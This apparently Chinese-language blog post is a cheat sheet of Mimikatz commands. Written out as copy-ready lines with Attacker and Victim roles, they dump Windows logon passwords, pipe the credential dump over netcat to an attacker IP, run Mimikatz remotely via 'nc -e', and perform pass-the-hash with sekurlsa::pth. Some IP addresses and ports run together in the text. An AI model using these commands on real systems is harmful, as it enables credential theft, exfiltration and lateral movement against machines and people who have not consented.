z0nek

关于我

1.记录 Mimikatz输出:

  1. C:\>mimikatz.exe ""privilege::debug""""log sekurlsa::logonpasswords full""exit&& dir

 2.将输出导入到本地文件: 

  1. C:\>mimikatz.exe ""privilege::debug""""sekurlsa::logonpasswords full""exit>> log.txt

 3.将输出传输到远程机器:

Attacker执行:

  1. E:\>nc -lvp 4444

Victim执行:

  1. C:\>mimikatz.exe ""privilege::debug""""sekurlsa::logonpasswords full""exit| nc.exe -vv 192.168.52.14444

192.168.52.1 为Attacker IP

 4.通过nc远程执行Mimikatz:

Victim执行:

  1. C:\>nc -lvp 443

Attacker执行:

  1. E:\>nc.exe -vv 192.168.52.128443-e mimikatz.exe

192.168.52.128 为Victim IP

 5.hash传递 

  1. Privilege::debug

  2. sekurlsa::pth /domain:xxxx /user:xxxxx /ntlm:xxxxxx

之后会弹出cmd。


标签:奇淫技巧

评论
© z0nek | Powered by LOFTER